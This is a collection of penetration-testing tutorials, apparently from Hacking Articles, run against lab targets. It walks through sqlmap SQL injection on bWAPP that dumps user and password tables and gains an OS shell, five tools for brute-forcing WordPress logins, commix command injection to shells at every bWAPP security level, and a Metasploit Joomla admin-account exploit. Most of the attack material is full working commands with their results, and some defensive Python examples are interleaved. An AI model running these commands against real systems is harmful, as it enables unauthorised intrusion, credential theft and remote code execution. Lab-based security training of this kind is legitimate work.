Database Penetration Testing using Sqlmap (Part 1)

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

For more details visit their official site sqlmap.org

First you need to install the bWAPP lab in your XAMPP or WAMP server (read the full article here). Then open bWAPP on your PC and log in with the following credentials:

Let’s begin!!!

Start the Apache and MySQL services in your XAMPP or WAMP server, then open the lab address in a browser; I am using 192.168.1.101:81/bWAPP/login.php. Enter the username and password as bee and bug respectively.

Set the security level to low, then from the "Choose your bug" list box select SQL Injection (GET/Search) and click Hack.

Type any movie name in the text field, then start Burp Suite in Kali Linux.

To capture the bWAPP cookie, click the Proxy tab and then the Intercept is on button; go back to bWAPP and click the submit button. The intercepted request supplies the values used in the sqlmap commands.

Open a terminal in Kali Linux and type the sqlmap command.

From the intercepted request in Burp Suite, copy the referer, cookie and target URL and use them in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs

sqlmap will now analyse the URL, connect to the target and inject SQL queries (sending the given cookies so the session is accepted) to fetch the names of all databases. As you can see in the image below, we have retrieved every database name. Choose one to fetch more details.
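The flaw sqlmap is working on here is a search page that splices the title parameter into its SQL text. As an added example (not code from this post or from bWAPP), here is a minimal Python/sqlite3 model of such a movie search: the concatenated query next to a parameterised one, run on a constructed movies table. It shows what the two injection techniques named above key on: a tautology that turns the filter into "match everything" (boolean-based), and a stray quote that raises a database error (error-based), and that the bound-parameter version exhibits neither.

```python
import sqlite3

# Constructed stand-in for bWAPP's movies table; these rows are made up for
# the example and are not bWAPP's data.
SAMPLE_MOVIES = [
    (1, "Thor", 2011),
    (2, "Iron Man", 2008),
    (3, "The Incredible Hulk", 2008),
]


def make_db():
    """Build an in-memory SQLite database holding the sample movies."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year INTEGER)"
    )
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", SAMPLE_MOVIES)
    return conn


def search_vulnerable(conn, title):
    """Search the way an injectable page does: the user's text is spliced
    into the SQL string, so a quote in the input rewrites the query."""
    sql = "SELECT id, title FROM movies WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def search_hardened(conn, title):
    """Same search with a bound parameter: the driver ships the value
    separately from the SQL text, so the input is only ever data."""
    sql = "SELECT id, title FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title + "%",)).fetchall()


def leaks_db_error(search, conn, title):
    """True if the input makes the query fail. An application that shows
    that error to the user is what sqlmap's error-based technique keys on."""
    try:
        search(conn, title)
        return False
    except sqlite3.Error:
        return True


def demo():
    """Compare both searches on an ordinary title, on the textbook tautology
    that boolean-based injection builds on, and on a lone quote."""
    conn = make_db()
    normal = "thor"
    tautology = "x' OR 1=1 --"
    return {
        "vuln_normal": len(search_vulnerable(conn, normal)),
        "vuln_tautology": len(search_vulnerable(conn, tautology)),
        "vuln_error_on_quote": leaks_db_error(search_vulnerable, conn, "thor'"),
        "hard_normal": len(search_hardened(conn, normal)),
        "hard_tautology": len(search_hardened(conn, tautology)),
        "hard_error_on_quote": leaks_db_error(search_hardened, conn, "thor'"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the vulnerable version the tautology returns all three rows and the lone quote raises a syntax error; in the hardened version the same strings are just search patterns that match nothing and raise nothing. That is the whole of the fix: bind values, never build SQL from request data.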

I am interested in bwapp, so to fetch all the tables under bwapp I will type the following command in the terminal.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp --tables

Here we have got the names of 5 tables: blog, heroes, movies, users, visitors.

To dig further into a table, use the following command for each table in turn.

I want to know the column details of the blog table, so I run the command below; the result is shown in the image that follows.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp -T blog --columns

This command fetches all columns of the blog table. It shows there are 4 columns, with their data types.

To see the contents of the blog table, I will now use the following command, which dumps every field in the blog columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T blog -C date,entry,id,owner --dump

The blog table appears to be empty, as all fields are blank.

I want to know the column details of the users table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs -D bwapp -T users --columns

We have got all columns of the users table with their data types.

Again I will look inside the table with the following command, which dumps all fields in the users columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T users -C id,emails,login,password,secret --dump

Here I found only two entries; as you can see, sqlmap dumped only the columns I named in the command, not the whole table.

Repeat the whole process again for the movies table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T movies --columns

In the same way the tool has fetched all columns of the movies table with their data types.

Again I want to look inside its columns, so I will use the same command with the table name changed.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T movies -C genre,id,imdb,main_character,release_year,tickets_stock,title --dump

Wow!! There are 10 entries; as you can see, the tool has again dumped all the data I requested.

Once again repeat the whole process for the heroes table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes --columns

We have 4 columns with their data types.

For more information, repeat the process to dump the details under its columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes -C id,login,password,secret --dump

We have got the id, login, password and secret entries. Read the details from the table.

Again repeat the same process for our last table, visitors.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors --columns

The visitors table also has 4 columns with their data types.

Let's look inside its columns as well.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors -C date,id,ip_address,user_agent --dump

Cool!!! Like the blog table, it is also empty. But the task does not end here; the more interesting part begins now.

We have traversed each and every table completely, but more important than fetching table details is gaining an os-shell on the web server.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp --os-shell

The above command will try to generate a backdoor: type 4 for a PHP payload and type 1 to use a common location as the writable directory.

Awesome!!!  We got the shell.

os-shell> net users

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

5 ways to Brute Force Attack on WordPress Website

Brute force attack using Burp Suite

To make Burp Suite work, first turn on a manual proxy in the browser: go to Settings and choose Preferences, then select Advanced, go to Network and select Settings.

Now select Manual proxy configuration, type your localhost address in the HTTP Proxy field and set the port to 8080. Click OK.

Now open WordPress on your PC; it will ask you for a username and password. Before entering them, start Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.

With interception on, type any password you like so that Burp Suite captures the request. Look at the image and notice the last line of the captured data: it shows that I tried to log in with admin:admin as username and password respectively.

Send the captured request to Intruder by right-clicking in the request area and choosing Send to Intruder, or simply press Ctrl+I.

Now open the Intruder tab and select the Positions tab; without altering the data, click the Clear button on the right side of the frame.

Now select the fields I have selected in the image and click the Add button on the right side of the frame. This configures the positions where payloads will be inserted into the base request.

Select the attack type, which determines how payloads are assigned to the payload positions. I will choose Cluster bomb, since the number of payload sets depends on the attack type and we have 2 payload positions.

Click Payload set, which shows the numbers 1 and 2; select 1 for the first payload position. Then click the Load button under Payload Options and load a simple list of strings to use as payloads, or add the path of a dictionary containing usernames only. Similarly, select 2 for the second payload position and add the path of a dictionary containing passwords only. Click Start attack.

The brute-force attack will now try every combination of the two payload sets as username and password.

When the attack finishes, you can pick out the valid credentials by checking the status and length columns, which differ from the rest of the combinations.

From the result, user:bitnami is the username and password respectively.

Brute force attack using wpscan

WPScan is a black-box WordPress vulnerability scanner that is installed by default in Kali Linux. For a WordPress brute-force attack you need a good dictionary, or you can make your own dictionary for the attack.

ruby ./wpscan.rb --url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user

In this brute-force attack I have only added a wordlist for the password. From the result, user:bitnami is the login and password respectively.

Brute force attack using metasploit

This module tests WordPress logins on a range of machines and reports successful logins. If you have loaded a database plugin and connected to a database, the module records successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4

msf auxiliary(wordpress_login_enum) > set rport 80

msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt

msf auxiliary(wordpress_login_enum) > exploit

The WordPress brute force was successful for the login user:bitnami as username and password.

Brute force attack using OWASP ZAP

ZAP is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. We will now use it for a brute-force attack; the whole process is the same as with Burp Suite.

Start OWASP ZAP and turn on a manual proxy in the browser: go to Settings and choose Preferences, then select Advanced, go to Network and select Settings. Select Manual proxy configuration, type your localhost address in the HTTP Proxy field and set the port to 8080. Click OK.

Now once again open WordPress on your PC; it will ask for the username and password.

ZAP captures the request; as you can see, I have logged in with user as the username and password as the password. In the Request section of the tool, select the value you entered on the page: I will select only the password in the captured data, then right-click and choose the Fuzz option.

When you click Fuzz, a new Fuzzer window opens; click the Add button on the left of the frame and an Add Payload window opens. Click Select and choose your dictionary for the attack.

Click Add again and then click Start Fuzzer.

After starting the fuzzer, another screen opens; click the Options button and select the Depth first radio button as the payload replacement strategy. Tick the Follow redirects check box and click Start Fuzzing.

When the attack finishes, you can pick out the valid credential by checking the state and the size of the response header, which differ from the rest of the combinations.

From the result, bitnami is the password for the login user.

Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open a Kali terminal and type the following Nmap command:

nmap -sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.17
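Every tool in this section leaves the same footprint on the web server: a burst of POST requests to wp-login.php from one source, each answered with the re-rendered login form, and then one answer that differs (the status and length change the article tells you to look for in Burp and ZAP). As an added example, not part of the original post or of any of the tools above, here is a Python detector that reads Apache-style access log lines and flags a source once it has collected a threshold of failed logins inside a sliding window, marking the case where a later redirect suggests a guess succeeded. The log lines are constructed for the example; the assumption that WordPress answers a failed login with HTTP 200 (form shown again) and a successful one with a 302 redirect is standard WordPress behaviour.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log lines constructed for this example; not real traffic.
# 192.168.1.50 posts to wp-login.php five times and gets 200 each time
# (failed login, form re-rendered), then gets a 302 (successful login).
# 192.168.1.77 is an ordinary user who logs in on the first try.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Jan/2017:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.77 - - [10/Jan/2017:10:00:07 +0000] "GET /wp-login.php HTTP/1.1" 200 3542 "-" "Mozilla/5.0"
192.168.1.77 - - [10/Jan/2017:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2017:10:00:21 +0000] "GET /wp-admin/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        # Drop any query string so /wp-login.php?redirect_to=... still matches.
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs that POST to /wp-login.php and receive `threshold` or
    more failure responses (HTTP 200) inside a sliding time window. If a
    flagged IP later receives a 302 on the same endpoint, a guess probably
    succeeded; that is the case needing an immediate response."""
    recent_failures = defaultdict(deque)
    report = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != "/wp-login.php":
            continue
        ip = ev["ip"]
        if ev["status"] == 200:
            q = recent_failures[ip]
            q.append(ev["ts"])
            # Forget failures that have fallen out of the window.
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                entry = report.setdefault(ip, {"failures": 0, "login_succeeded": False})
                entry["failures"] = len(q)
        elif ev["status"] == 302 and ip in report:
            report[ip]["login_succeeded"] = True
    return report


def demo():
    """Run the detector over the constructed sample log."""
    return detect_login_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, info in demo().items():
        print(ip, info)
```

On the sample log the detector reports 192.168.1.50 with five failures in the window and login_succeeded set, and says nothing about 192.168.1.77. The same count-per-window logic is what a WordPress login-limiting plugin or a fail2ban jail implements; the point of having it in the log pipeline as well is that the article's attacks show up there even when the application itself does no rate limiting.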


bWAPP Command Injection Exploitation using Commix (Bypass All Security)

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

First you need to set up the bWAPP lab in your XAMPP or WAMP server; for this you can read my previous article, Web Pentest Lab Setup using bWAPP, here.

Now I am going to perform an OS command injection attack using bWAPP.

Start the Apache and MySQL services in your XAMPP or WAMP server, then open the lab address in a browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the username and password as bee and bug respectively.

My task is to bypass all three security levels in bWAPP through OS command injection.

Let's start!

 Set security level: low

Look at the image below: I have set the security level to low. From the "Choose your bug" option select OS Command Injection and click Hack.

Type an IP in the DNS lookup field, then start Burp Suite in Kali Linux. Don't forget to set the proxy in your browser while using Burp Suite.

To capture the bWAPP cookie, click the Proxy option and then the Intercept is on button; go back to bWAPP and click the DNS lookup button.

As you can see, I have captured the cookie in Burp Suite.

Open a terminal in Kali Linux and type the commix command.

From the captured data in Burp Suite, copy the referer, cookie and target and use them in the following command.

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0" --data="target=192.168.1.103&form=submit"

This command runs commix in the terminal, which automatically performs a command injection attack against bWAPP using the URL and cookie information.

Type 'y' to resume the classic injection point and again to open a pseudo-terminal shell.

The attack is successful and commix provides an OS shell.

Commix (os_shell) > systeminfo
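What commix is exploiting in this page is the pattern the OWASP text at the top describes: the DNS lookup field is passed to a system shell as part of a command string. As an added example, not the post's or bWAPP's own code, here is a Python model of that lookup. The vulnerable shape builds one shell string from the raw field (returned rather than executed, so the example has no side effects); the hardened shape validates the field against an allow-list of IP-address or hostname syntax and then runs the resolver from an argument vector with shell=False, so no shell ever parses user input. The function names and the hostname regex are this example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: dot-separated labels of letters, digits and
# hyphens, no label starting or ending with a hyphen, 253 characters max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def build_lookup_shell_string(target):
    """The vulnerable shape: the form field is concatenated into a single
    string for /bin/sh, so any shell metacharacter in the field changes
    what the shell runs. Returned, not executed."""
    return "nslookup " + target


def is_valid_lookup_target(target):
    """Allow-list check: the value must be a literal IP address or a
    syntactically valid hostname. Everything else is refused, which
    removes shell metacharacters without trying to enumerate them."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(target))


def build_lookup_argv(target):
    """The hardened shape: validate first, then build an argument vector.
    With shell=False the vector goes straight to execve and nothing
    re-parses it. A valid hostname or IP cannot begin with '-', so the
    value cannot be mistaken for an nslookup option either."""
    if not is_valid_lookup_target(target):
        raise ValueError("refusing DNS lookup target: %r" % target)
    return ["nslookup", target]


def run_lookup(target, timeout=10):
    """Run the hardened lookup. Needs a working resolver, so it is not
    exercised by the tests; everything above it is."""
    result = subprocess.run(
        build_lookup_argv(target), capture_output=True, text=True, timeout=timeout
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: two legitimate targets and one carrying a shell
    # separator, which the allow-list rejects before any command is built.
    for candidate in ["192.168.1.103", "example.com", "127.0.0.1; echo injected"]:
        print(repr(candidate), "accepted:", is_valid_lookup_target(candidate))
```

The contrast with bWAPP's medium and high levels, which commix walks through below, is the design choice: stripping or escaping particular characters keeps the shell in the loop and leaves the filter to be argued with, whereas an allow-list plus an argument vector takes the shell out of the loop entirely.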

Set security level: medium

Look at the image below: I have now set the security level to medium. From the "Choose your bug" option select OS Command Injection and click Hack.

Repeat the process as above: type the IP in the DNS lookup field, then start Burp Suite.

Click Intercept is on, go back to bWAPP and click the DNS lookup button. As you can see, I have captured the cookie for the medium level in Burp Suite.

From the captured data in Burp Suite, copy the referer, cookie and target and use them in the following command.

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=1" --data="target=192.168.1.103&form=submit"

Type 'y' to resume the classic injection point and again to open a pseudo-terminal shell.

The attack is successful at medium security and commix again provides an OS shell.

Commix (os_shell) > ipconfig

Set security level: high

After obtaining an OS shell at low and medium, my next target is high security; now I am trying to bypass this level by repeating the same process once again.

Set the security level to high, choose the bug OS Command Injection and click Hack.

Type the IP in the DNS lookup field, then start Burp Suite in Kali Linux. From the captured data in Burp Suite, copy the referer, cookie and target and use them in the following command.

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=2" --data="target=192.168.1.103&form=submit"

Type 'y' to resume the classic injection point and again to open a pseudo-terminal shell. We have successfully bypassed the high level as well with the same process.

Commix (os_shell) > systeminfo


Exploiting Joomla Website using Account Creation and Privilege Escalation

In this article we will learn about hacking Joomla CMS. To do so we will use a pre-installed Metasploit module that creates an account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).

 Exploit Targets

Joomla 3.4.4 through 3.6.3

Requirement

Attacker: Kali Linux

Victim PC: Joomla 3.4.4

Open a terminal in Kali and type msfconsole to start Metasploit.

Once Metasploit has started, type the following commands to execute the attack:

msf > use auxiliary/admin/http/joomla_registration_privesc

msf auxiliary(joomla_registration_privesc) > set rhost 192.168.0.103

msf auxiliary(joomla_registration_privesc) > set username raj

msf auxiliary(joomla_registration_privesc) > set password raj123

msf auxiliary(joomla_registration_privesc) > set email raj@hackingarticles.in

msf auxiliary(joomla_registration_privesc) > set targeturi /joomla

msf auxiliary(joomla_registration_privesc) > exploit

Performing this attack lets you create a username and password of your choice; in this case I have given username: raj, password: raj123 and email ID: raj@hackingarticles.in.

In the image below you can see that a new user is created with the username and password you provided.

Having created the user, you can log in with that username.

Thus you can hack Joomla CMS in the simplest of ways.
